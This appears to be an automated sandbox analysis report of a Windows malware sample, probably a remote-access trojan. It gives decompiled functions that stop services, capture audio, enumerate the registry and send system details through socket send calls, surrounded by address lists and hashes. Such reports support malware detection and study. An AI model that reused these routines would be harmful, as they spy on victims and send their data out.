                                                                                                0x004404a0
                                                                                                0x0044049b
                                                                                                0x00440496
                                                                                                0x00440466
                                                                                                0x00440466
                                                                                                0x00440469
                                                                                                0x004404c0
                                                                                                0x004404c0
                                                                                                0x004404c1
                                                                                                0x004404c2
                                                                                                0x004404c3
                                                                                                0x004404c5
                                                                                                0x004404ca
                                                                                                0x004404d2
                                                                                                0x004404da
                                                                                                0x004404de
                                                                                                0x004404e4
                                                                                                0x004404e5
                                                                                                0x004404e7
                                                                                                0x004404e9
                                                                                                0x004404f2
                                                                                                0x004404f7
                                                                                                0x004404fd
                                                                                                0x00440500
                                                                                                0x00440503
                                                                                                0x00440508
                                                                                                0x00440517
                                                                                                0x0044051c
                                                                                                0x0044051f
                                                                                                0x00440521
                                                                                                0x0044053b
                                                                                                0x00440548
                                                                                                0x0044054a
                                                                                                0x0044054c
                                                                                                0x00000000
                                                                                                0x0044054e
                                                                                                0x0044054e
                                                                                                0x00440551
                                                                                                0x00440554
                                                                                                0x0044055f
                                                                                                0x00440562
                                                                                                0x00440567
                                                                                                0x0044056a
                                                                                                0x0044056c
                                                                                                0x0044058f
                                                                                                0x0044058f
                                                                                                0x00440594
                                                                                                0x00440599
                                                                                                0x0044059a
                                                                                                0x0044059e
                                                                                                0x004405a4
                                                                                                0x004405a7
                                                                                                0x004405a9
                                                                                                0x004405ad
                                                                                                0x004405b1
                                                                                                0x004405b7
                                                                                                0x004405bc
                                                                                                0x004405bd
                                                                                                0x004405c2
                                                                                                0x004405c2
                                                                                                0x004405c2
                                                                                                0x004405b1
                                                                                                0x004405c5
                                                                                                0x004405c8
                                                                                                0x004405cf
                                                                                                0x004405d1
                                                                                                0x004405d8
                                                                                                0x004405de
                                                                                                0x004405e0
                                                                                                0x004405e2
                                                                                                0x004405e6
                                                                                                0x004405e7
                                                                                                0x004405ed
                                                                                                0x004405f3
                                                                                                0x004405f3
                                                                                                0x004405f3
                                                                                                0x004405f3
                                                                                                0x004405e7
                                                                                                0x004405e0
                                                                                                0x004405d8
                                                                                                0x004405fb
                                                                                                0x004405fd
                                                                                                0x00440604
                                                                                                0x00440608
                                                                                                0x0044060f
                                                                                                0x0044056e
                                                                                                0x0044056e
                                                                                                0x00440571
                                                                                                0x00440578
                                                                                                0x00440578
                                                                                                0x00440579
                                                                                                0x0044057a
                                                                                                0x0044057b
                                                                                                0x0044057c
                                                                                                0x00000000
                                                                                                0x00440573
                                                                                                0x00440573
                                                                                                0x00440576
                                                                                                0x0044057f
                                                                                                0x00440581
                                                                                                0x00000000
                                                                                                0x00440583
                                                                                                0x00440584
                                                                                                0x00000000
                                                                                                0x00440589
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440576
                                                                                                0x00440571
                                                                                                0x0044056c
                                                                                                0x00440523
                                                                                                0x00440523
                                                                                                0x00440526
                                                                                                0x0044052d
                                                                                                0x0044052d
                                                                                                0x0044052e
                                                                                                0x0044052f
                                                                                                0x00440530
                                                                                                0x00440531
                                                                                                0x00440532
                                                                                                0x00440532
                                                                                                0x00440528
                                                                                                0x00440528
                                                                                                0x0044052b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044052b
                                                                                                0x00440537
                                                                                                0x00440539
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440539
                                                                                                0x004404eb
                                                                                                0x004404eb
                                                                                                0x004404eb
                                                                                                0x0044061b
                                                                                                0x0044046b
                                                                                                0x0044046b
                                                                                                0x0044046e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044046e
                                                                                                0x00440469
                                                                                                0x0044043a
                                                                                                0x0044043f
                                                                                                0x004404bc
                                                                                                0x004404bf
                                                                                                0x004404bf

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: 566cfcf8c804574d67b9eb2eb36bbe01557985d331379be858919b5c1a739c6c
                                                                                                • Instruction ID: f63d0c326be49aad20fdc0adda446bc1fbab64303f82e00d34fc54ab1abf13bd
                                                                                                • Opcode Fuzzy Hash: 566cfcf8c804574d67b9eb2eb36bbe01557985d331379be858919b5c1a739c6c
                                                                                                • Instruction Fuzzy Hash: 14510832904205BBFB249B698C41EAF77A8DF48334F50421FFA15D6292DB3CDD608A6C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00442F68, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E00442F68(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46c1d0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00440628(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00443565(_t25, _t36, __eflags,  *0x46c1d0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00442DDA(_t25, _t31, 0x46d654);
							E004414D5(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E004414D5();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00440C29(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46c1d0; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00440628(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00443565(_t27, _t37, __eflags,  *0x46c1d0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00442DDA(_t27, _t32, 0x46d654);
									E004414D5(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E004414D5();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0044350F(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0044350F(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                                                0x00442f68
                                                                                                0x00442f68
                                                                                                0x00442f68
                                                                                                0x00442f72
                                                                                                0x00442f74
                                                                                                0x00442f79
                                                                                                0x00442f7c
                                                                                                0x00442f8a
                                                                                                0x00442f91
                                                                                                0x00442f96
                                                                                                0x00442f99
                                                                                                0x00442f9c
                                                                                                0x00442fae
                                                                                                0x00442fb3
                                                                                                0x00442fb5
                                                                                                0x00442fc0
                                                                                                0x00442fc7
                                                                                                0x00442fcc
                                                                                                0x00442fcf
                                                                                                0x00442fd1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442fb7
                                                                                                0x00442fb7
                                                                                                0x00000000
                                                                                                0x00442fb7
                                                                                                0x00442f9e
                                                                                                0x00442f9e
                                                                                                0x00442f9f
                                                                                                0x00442f9f
                                                                                                0x00442fa4
                                                                                                0x00442fdf
                                                                                                0x00442fe0
                                                                                                0x00442fe6
                                                                                                0x00442feb
                                                                                                0x00442fee
                                                                                                0x00442fef
                                                                                                0x00442ff0
                                                                                                0x00442ff7
                                                                                                0x00442ff9
                                                                                                0x00442ffb
                                                                                                0x00443000
                                                                                                0x00443003
                                                                                                0x00443011
                                                                                                0x0044301d
                                                                                                0x00443020
                                                                                                0x00443023
                                                                                                0x00443035
                                                                                                0x0044303a
                                                                                                0x0044303c
                                                                                                0x00443047
                                                                                                0x0044304d
                                                                                                0x00443055
                                                                                                0x00443057
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044303e
                                                                                                0x0044303e
                                                                                                0x00000000
                                                                                                0x0044303e
                                                                                                0x00443025
                                                                                                0x00443025
                                                                                                0x00443026
                                                                                                0x00443026
                                                                                                0x00443059
                                                                                                0x0044305a
                                                                                                0x0044305a
                                                                                                0x00443005
                                                                                                0x0044300b
                                                                                                0x0044300f
                                                                                                0x00443062
                                                                                                0x00443063
                                                                                                0x00443069
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044300f
                                                                                                0x00443070
                                                                                                0x00443070
                                                                                                0x00442f7e
                                                                                                0x00442f84
                                                                                                0x00442f88
                                                                                                0x00442fd3
                                                                                                0x00442fd4
                                                                                                0x00442fde
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442f88

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                • _free.LIBCMT ref: 00442F9F
                                                                                                • _free.LIBCMT ref: 00442FC7
                                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                • _abort.LIBCMT ref: 00442FE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: 1e4138895fae7c9047720f3c33760644ac9f1401f8a87db4429ce4b1c10d1c67
                                                                                                • Instruction ID: 2c0683b24ab965397330a20c71536410671755a8ab653b9c9cc214fb2eae9d72
                                                                                                • Opcode Fuzzy Hash: 1e4138895fae7c9047720f3c33760644ac9f1401f8a87db4429ce4b1c10d1c67
                                                                                                • Instruction Fuzzy Hash: 4CF0F4315487003AF211372ABD05F2B2536ABD1B7AFA0012BF90996296EEECC89A551D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416ED3, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00416ED3(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00401EDD( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE2();
				return _t16;
			}







                                                                                                0x00416ede
                                                                                                0x00416eed
                                                                                                0x00416efc
                                                                                                0x00416f00
                                                                                                0x00416f21
                                                                                                0x00416f24
                                                                                                0x00416f27
                                                                                                0x00416f02
                                                                                                0x00416f03
                                                                                                0x00416f03
                                                                                                0x00416f2c
                                                                                                0x00416f39

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004168FA,00000000), ref: 00416EE2
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004168FA,00000000), ref: 00416EF6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004168FA,00000000), ref: 00416F03
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,004168FA,00000000), ref: 00416F12
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004168FA,00000000), ref: 00416F24
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004168FA,00000000), ref: 00416F27
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b42d642342782bdebb0959b0029eefb95f6047d298d638c5d11a833be5b35123
                                                                                                • Instruction ID: 0454fd493aead8f103b726478faddeea12546fc58cd4c8d89fe282ce12ce19e9
                                                                                                • Opcode Fuzzy Hash: b42d642342782bdebb0959b0029eefb95f6047d298d638c5d11a833be5b35123
                                                                                                • Instruction Fuzzy Hash: 7FF0C2325002186BD210AF65AC89DBF3B6CDB85B55F11002AFF099A192DB38CD8695E9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401853, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00401853(void* __edx, intOrPtr _a8, intOrPtr _a16) {
				char _v32;
				void* _v52;
				char _v64;
				void* _v76;
				char _v96;
				void* _v100;
				char _v120;
				void* _v124;
				char _v144;
				void* _v148;
				char _v168;
				void* _v172;
				char _v192;
				void* _v196;
				char _v216;
				char _v220;
				char _v232;
				char _v240;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t40;
				signed int _t59;
				void* _t107;
				signed int _t121;
				void* _t123;

				_t107 = __edx;
				_t123 = (_t121 & 0xfffffff8) - 0xdc;
				if( *0x46fd78 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0042FE69(0x46fd78);
					_t126 =  *0x46fd78 - 0xffffffff;
					if( *0x46fd78 == 0xffffffff) {
						E004047EF(0);
						E004301F3(_t126, E004538EF);
						E0042FE2A(0x46fd78, 0x46fd78);
					}
				}
				E004020C7(0,  &_v220);
				_t28 = _a8 - 0x3be;
				if(_t28 == 0) {
					L10:
					 *0x46fd7c = 0;
					goto L11;
				} else {
					if(_t28 != 0) {
						L11:
						return E00401FB9();
					}
					_t129 =  *0x46da74 - 1;
					if( *0x46da74 != 1) {
						_t32 = E00401E3B(0x46e0c8, _t107, _t129,  *0x46fd7c);
						_t33 = E0040209D(0,  &_v32, _t107, _t129, _a16, 0x20);
						_t34 = E0040209D(0,  &_v64, _t107, _t129, 0x46da98, 0x12);
						_t113 = E00402F85(0,  &_v192, E00402F0F( &_v168, E00402F85(0,  &_v144, E00402F0F( &_v120, E00402FA9( &_v96, 0x46e108, 0x46e250), _t34), _t129, 0x46e250), _t33), _t129, 0x46e250);
						_t40 = E00402F85(0,  &_v216, _t39, _t129, _t32);
						_t13 =  &_v240; // 0x46e250
						E00401FC3(_t13, _t39, 0x46e250, _t40);
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						waveInUnprepareHeader( *0x46dab8, ( *0x46fd7c << 5) +  *0x46e104, 0x20);
						E004017D6( *0x46fd7c, _t39, _t129);
						_t130 =  *0x46fcfc - 0xffffffff;
						if( *0x46fcfc == 0xffffffff) {
							E00404943(0x46fcf8);
							E004049DE(0x46fcf8, 0x46e250, 0x46fcf8);
						}
						E004020DE(0, _t123 - 0x18, _t113, _t130,  &_v232);
						_push(0x61);
						E00404BB7(0, 0x46fcf8, _t113, _t130);
						_t59 =  *0x46fd7c + 1;
						 *0x46fd7c = _t59;
						if(_t59 < 2) {
							goto L11;
						} else {
							goto L10;
						}
					}
					E00404F18(0x46fcf8, _t107);
					ExitThread(0);
				}
			}

































                                                                                                0x00401853
                                                                                                0x0040185f
                                                                                                0x0040187c
                                                                                                0x00401884
                                                                                                0x00401889
                                                                                                0x00401891
                                                                                                0x00401896
                                                                                                0x004018a0
                                                                                                0x004018a7
                                                                                                0x004018ac
                                                                                                0x00401891
                                                                                                0x004018b1
                                                                                                0x004018b9
                                                                                                0x004018be
                                                                                                0x00401a3e
                                                                                                0x00401a3e
                                                                                                0x00000000
                                                                                                0x004018c4
                                                                                                0x004018c8
                                                                                                0x00401a44
                                                                                                0x00401a53
                                                                                                0x00401a53
                                                                                                0x004018ce
                                                                                                0x004018d5
                                                                                                0x004018f0
                                                                                                0x00401908
                                                                                                0x0040191d
                                                                                                0x0040196c
                                                                                                0x00401972
                                                                                                0x00401979
                                                                                                0x0040197d
                                                                                                0x00401986
                                                                                                0x0040198f
                                                                                                0x00401998
                                                                                                0x004019a1
                                                                                                0x004019ad
                                                                                                0x004019b9
                                                                                                0x004019c5
                                                                                                0x004019d1
                                                                                                0x004019ed
                                                                                                0x004019f9
                                                                                                0x004019fe
                                                                                                0x00401a05
                                                                                                0x00401a09
                                                                                                0x00401a11
                                                                                                0x00401a11
                                                                                                0x00401a20
                                                                                                0x00401a25
                                                                                                0x00401a29
                                                                                                0x00401a33
                                                                                                0x00401a34
                                                                                                0x00401a3c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00401a3c
                                                                                                0x004018d9
                                                                                                0x004018df
                                                                                                0x004018df

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 004018A7
                                                                                                • ExitThread.KERNEL32 ref: 004018DF
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,0046E250,00000000), ref: 004019ED
                                                                                                  • Part of subcall function 004301F3: __onexit.LIBCMT ref: 004301F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: PF$PF
                                                                                                • API String ID: 1649129571-46260917
                                                                                                • Opcode ID: ca3cf83082cdc1493e618bb5e94ac237a145dec21da409530aad43cec5e03876
                                                                                                • Instruction ID: 3c66eb6a83d21cef28f5aab579d60ff8fc289dd21e4a165b0a87aeecbb3246fb
                                                                                                • Opcode Fuzzy Hash: ca3cf83082cdc1493e618bb5e94ac237a145dec21da409530aad43cec5e03876
                                                                                                • Instruction Fuzzy Hash: D941C4716042014BC314FB75E895EAEB3A4AB94318F10463FF146A61F2EFB89D09CA1E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00411075, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E00411075(short* __ecx, char __edx, void* __eflags, char _a4) {
				char _v5;
				void* _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				void* __ebx;
				void* _t28;
				void* _t35;
				void* _t36;
				void* _t61;
				short* _t116;
				void* _t120;
				void* _t121;
				void* _t122;

				_t103 = __edx;
				_t121 = _t120 - 0x18;
				_v5 = __edx;
				_t116 = __ecx;
				E004020DE(_t61, _t121, __edx, __eflags,  &_a4);
				_t28 = E00410FE4(_t61, __eflags);
				_t122 = _t121 + 0x18;
				_t62 = 0;
				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v12) != 0) {
					E00402076(0, _t122 - 0x18, "3");
					_push(0x72);
					E00404BB7(0, 0x46e7b0, _t103, __eflags);
				} else {
					E00410DBD(_v12);
					_t35 = E00417D8C(0,  &_v228, 0x46e780);
					_t36 = E00417D8C(0x46e768,  &_v204, 0x46e768);
					_t127 = _v5;
					_t107 =  ==  ? "0" : "1";
					E00402F85(0x46e768, _t122 - 0x18, E00402F85(0x46e768,  &_v36, E00402F85(0x46e768,  &_v60, E00402F85(0x46e768,  &_v84, E00402F0F( &_v108, E00402F85(0x46e768,  &_v132, E00402F0F( &_v156, E00405416( &_v180,  ==  ? "0" : "1", _v5, 0x46e250), _t36), _v5, 0x46e250), _t35), _v5, 0x46e250), _t127, 0x46e798), _t127, 0x46e250), _t127, 0x46e830);
					_push(0x71);
					E00404BB7(0x46e768, 0x46e7b0, _t44, _t127);
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00409DFE(0x46e768, 0x46e780, 0x46079c);
					E00409DFE(0x46e768, 0x46e768, 0x46079c);
					E00405BB7(0x46e768, 0x46e798, 0x460734);
					E00405BB7(0x46e768, 0x46e830, 0x460734);
					RegCloseKey(_v12);
					_t62 = 1;
				}
				E00401FB9();
				return _t62;
			}























                                                                                                0x00411075
                                                                                                0x00411081
                                                                                                0x00411084
                                                                                                0x00411087
                                                                                                0x0041108f
                                                                                                0x00411094
                                                                                                0x00411099
                                                                                                0x0041109f
                                                                                                0x004110b2
                                                                                                0x00411212
                                                                                                0x00411217
                                                                                                0x0041121e
                                                                                                0x004110b8
                                                                                                0x004110bb
                                                                                                0x004110e1
                                                                                                0x004110f5
                                                                                                0x004110fa
                                                                                                0x00411110
                                                                                                0x00411162
                                                                                                0x00411168
                                                                                                0x0041116f
                                                                                                0x00411177
                                                                                                0x0041117f
                                                                                                0x00411187
                                                                                                0x0041118f
                                                                                                0x00411197
                                                                                                0x004111a2
                                                                                                0x004111ad
                                                                                                0x004111b8
                                                                                                0x004111c3
                                                                                                0x004111d3
                                                                                                0x004111db
                                                                                                0x004111eb
                                                                                                0x004111f6
                                                                                                0x004111fe
                                                                                                0x00411204
                                                                                                0x00411204
                                                                                                0x00411226
                                                                                                0x00411233

                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 004110AA
                                                                                                  • Part of subcall function 00410DBD: RegQueryInfoKeyW.ADVAPI32 ref: 00410E24
                                                                                                  • Part of subcall function 00410DBD: RegEnumKeyExW.ADVAPI32 ref: 00410E53
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • RegCloseKey.ADVAPI32(?,00460734,00460734,0046079C,0046079C,00000071), ref: 004111FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                • String ID: 0F$PF$hF
                                                                                                • API String ID: 3114080316-2901678694
                                                                                                • Opcode ID: 68cfc81bef551c38b0dbe514ee31dc92708f229dc4192a237cc7c3fec3706d42
                                                                                                • Instruction ID: 8546a0cc8ff6da04223f9fb1dfd2eecf95a75eab04c796a68e61f63c8a8cfcb4
                                                                                                • Opcode Fuzzy Hash: 68cfc81bef551c38b0dbe514ee31dc92708f229dc4192a237cc7c3fec3706d42
                                                                                                • Instruction Fuzzy Hash: 5F41E431A0411457C704B7A6DC92AEEB779AF94308F40417FF106771D2EFB8AE898A5D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004085C0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E004085C0(void* __ecx, void* __edx, char _a4) {
				char _v11;
				char _v15;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t39;
				void* _t40;
				void* _t44;
				void* _t45;
				void* _t57;
				void* _t117;
				intOrPtr _t119;
				void* _t132;
				void* _t135;

				_t117 = __edx;
				E00401F9F(__ecx + 0x90,  &_a4);
				_v16 = 0;
				_v15 = 0;
				_v11 = 0;
				GetKeyboardLayoutNameA( &_v16);
				E00404943(0x46e460);
				E004049DE(0x46e460, _t132, 0x46e460);
				_t39 = E00401F87(E00401E3B(0x46e3a4, _t117, 0, 0x12));
				_t40 = E00401E3B(0x46e3a4, _t117, 0, 0x2a);
				_t44 = E00417C16(0x46e250,  &_v280, E00418473(E00401EDD(0x46e410)));
				_t119 =  *0x46e458; // 0x0
				_t45 = E00417C16(0x46e250,  &_v256, _t119);
				E00402F85(0x46e250, _t135 - 0x18, E00402F85(0x46e250,  &_v40, E00402F85(0x46e250,  &_v64, E00402F85(0x46e250,  &_v88, E00402F0F( &_v112, E00402F85(0x46e250,  &_v136, E00402F0F( &_v160, E00402F85(0x46e250,  &_v184, E00407723(0x46e250,  &_v208, E00405416( &_v232,  &_v16, 0, 0x46e250), _t135 - 0x18, 0,  *_t39 & 0x000000ff), 0, 0x46e250), _t45), 0, 0x46e250), _t44), 0, 0x46e250), 0,  &_a4), 0, 0x46e250), 0, _t40);
				_push(0x12);
				_t57 = E00404BB7(0x46e250, 0x46e460, _t55, 0);
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				return _t57;
			}






























                                                                                                0x004085c0
                                                                                                0x004085d6
                                                                                                0x004085dd
                                                                                                0x004085e0
                                                                                                0x004085e3
                                                                                                0x004085ea
                                                                                                0x004085f7
                                                                                                0x004085ff
                                                                                                0x00408614
                                                                                                0x0040861f
                                                                                                0x0040864e
                                                                                                0x00408653
                                                                                                0x00408661
                                                                                                0x004086e4
                                                                                                0x004086ea
                                                                                                0x004086f1
                                                                                                0x004086fb
                                                                                                0x00408703
                                                                                                0x0040870b
                                                                                                0x00408713
                                                                                                0x0040871e
                                                                                                0x00408729
                                                                                                0x00408734
                                                                                                0x0040873f
                                                                                                0x0040874a
                                                                                                0x00408755
                                                                                                0x00408760
                                                                                                0x00408768
                                                                                                0x00408775

                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32 ref: 004085EA
                                                                                                  • Part of subcall function 004049DE: connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                  • Part of subcall function 00418473: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00408646,0046E250,?,0046E250,00000000), ref: 00418488
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
